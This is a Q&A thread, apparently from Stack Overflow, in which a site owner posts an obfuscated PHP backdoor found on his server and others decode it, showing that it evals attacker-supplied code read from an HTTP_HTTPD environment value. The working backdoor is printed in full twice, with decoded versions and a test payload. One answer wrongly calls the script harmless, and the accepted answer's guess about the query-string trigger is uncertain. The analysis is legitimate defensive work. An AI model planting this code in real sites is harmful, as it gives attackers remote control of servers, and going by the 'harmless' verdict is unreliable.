# Suspicious file found on server

Tags: eval, virus

I have found a suspicious file on my server, I am attempting to decode and figure out what it was put there to do.

The code is as follows, any tips on how to decode this.

```
<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>
```

Thanks,

Alan.

Comment: use tools like these http://ddecode.com/hexdecoder/ & http://www.base64decode.org/

Comment: So, how did it get there?  (Did you preserve the creation date/time and whatever other info you could extract about the file?)

Comment: (This probably belongs on security.stackexchange.com.)

Answer (score 3, accepted):

The functions in php you're looking for appear to be a combination of `base64_decode` and `urldecode.` For example:

```
urldecode("\x6d\x79s\x74r\x31s\x311\x30");
```

gives `"mystr1s110"`

Also part of the string in the eval statement base64_decodes to:

```
function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}
```

Those encoded strings all reference variables defined earlier, for example `\x6d\x79s\x74r\x31s\x311\x30` url-decodes to `mystr1s110`

This looks very nasty to me. Although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.

On a side note. You pulled this off the server, right?

EDIT:

Was kind of intrigued by this. After a complete decode I got this:

```
<?php 

if(!function_exists("myFunction2")){

class myClass {
    static $myVar1="SFRUUF9IVFRQRA=="; 
    static $myVar2=“base64_decode”; 
}

function myFunction1($myArg)
{
    ${$myVar4}=myClass::$myVar2;  // myClass::$myVar2 is just "base64_decode"
    return $myVar4( myClass::${$myArg} );  // reuturning base64_decode of the argument
}

function myFunction2($myArg2) 
{
    return myClass::${$myVar3} 
} 

$myFinalVar=@getenv(myFunction1('myVar1'));   //just gets env variable of base64 decode of myVar1

if($myFinalVar) {
    @eval($myFinalVar);  //executes

} 

?>
```

Looks to me like its a script designed to execute a script on another server. (i.e. they could just hit the web address with their script in url and it would execute.  `SFRUUF9IVFRQRA==` decodes to `HTTP_HTTPD` so they could hit `http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php` and it would run whatever they wanted on your server.

Comment: Yes I pulled this straight off my server, it's a bit beyond me and I really don't know how to reverse engineer this to see what it was trying to do. Thank you for your reply

Comment: This is pretty interesting. I'll look at it a bit more. I'll update the post.

Comment: @xbello I was updating when you posted this. Did I get it right that it would be a $_GET variable, or is there another environment variable or method of attack I'm not seeing?

Comment: @FrankConry, I don't know! My blind guess is that HTTP_HTTPD contains the executable of the web server (maybe in old php versions), this script extracts the value and "eval" it.

Comment: So it looks like my site was part of a larger comprmoise, my site being used to launch the attack? The worrying question is how it got there!

Comment: well, assuming I'm right, they could use your server to do whatever they wanted. Attack your site internally or others from your site. A company I worked for had a similar hack and all they did was run memory eating scripts through it to degrade the performance and crash the site.

Comment: @Frank Corny Any ideas how they get these files on the site in the first place, I am sure this is not happenning via ftp, how do they backdate the timestamp of the file?

Comment: not sure. I would guess they tricked apache to upload it, who was the files owner? Do you allow file uploads to the site?

Comment: @Frank Conry No file uploads are allowed, although the site does have a phpbb2 forum where a user can upload an avatar?

Answer (score 0):

According to me, it is not a harmful script, in fact, it is not of any use.

Here is the basis for my comments -

To decode, you can simply put the hex strings as argument to print_r().

```
print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");
```

Complete decoded code is:

```
<?php 
if(!function_exists("mystr1s45")){
    class mystr1s21 { 
        static $mystr1s279="SFRUUF9IVFRQRA==";
        static $mystr1s178="base64_decode"; 
    }
    eval(
        eval(
            function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
                ${mystr1s110}=mystr1s21::${mystr1s178};
                return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
            }
        );
        eval(
            function mystr1s45($mystr1s66) {
                return mystr1s21::${${mystr1s66}};
            }
        );
    );
}
$mystr1s2235=@getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
    @eval($mystr1s2235);
}
?>
```

The function mystr1s78 will return 'HTTP_HTTPD'. This will used as environment variable to get its value using getenv.

If you run the decoded code, you will face 'Parsing Error' near definition of function mystr1s78. This is because, eval expects a string and string must be a valid code statement(not expression).

```
Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('
```

As far as I know, by default, HTTP_HTTPD is not an environment variable which is set by apache or any webserver and even if it is a variable with some value, passing it to eval will not do anything.

To confirm, you can set an environment variable HTTP_HTTPD as follows:

```
<?php 
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} 

?>
```

Please let us know if you think this is malicious and can harm the system.

Comment: **eval** processes only valid PHP statement. Not sure if HTTP_HTTPD is used as environment variable, but even if it is used, its value will be the path of web_server's executable file. One cannot start the server just by passing the path to eval(not a valid PHP statement). Then how can this script crash the server or harm it in any way? @FrankConry

Comment: Honestly I'm not entirely sure how to get it to set it but you're wrong that it doesn't compile. Try compiling it before you decode it and prepend `apache_setenv('HTTP_HTTPD','echo getcwd();');` before the beginning of the script. The script will output the current directory. Clearly you could but a shell exec in there if you could get to `HTTP_HTTPD`. I was just intrigued by this and am not really a security guy, but this looks pretty fishy to me.

Comment: Exactly! The value of HTTP_HTTPD must be a valid PHP code, which is not the case here.. It will harm only if he is setting the HTTP_HTTPD value, as I have set in my example, unless, environment variables set using apache_setenv last cross sessions..